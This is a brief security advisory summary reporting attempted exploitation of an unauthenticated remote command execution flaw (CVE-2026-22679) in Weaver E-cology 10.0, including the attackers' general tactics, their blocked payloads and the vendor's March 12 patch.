Researchers at Vega documented attacks exploiting CVE-2026-22679 in Weaver E-cology 10.0 beginning mid-March that allowed unauthenticated remote command execution via an exposed debug API. Attackers ran discovery commands and attempted PowerShell payloads and a target-aware MSI (fanwei0324.msi), but endpoint defenses blocked execution and the vendorβs March 12 fix removes the vulnerable endpoint; users should apply the update immediately. #CVE-2026-22679 #WeaverE-cology
Keypoints
- A critical unauthenticated RCE (CVE-2026-22679) affected Weaver E-cology 10.0 builds prior to March 12.
- The flaw stemmed from an exposed debug API that passed user-supplied parameters to backend RPC without authentication or validation.
- Attackers executed reconnaissance commands and tried PowerShell-based payloads and a target-aware MSI (fanwei0324.msi) after confirming RCE capability via a Goby-linked callback.
- Endpoint defenses blocked downloads and execution, and attackers never established a persistent session on the targeted hosts.
- The vendor patch (build 20260312) removes the debug endpoint and upgrading is the only recommended mitigation.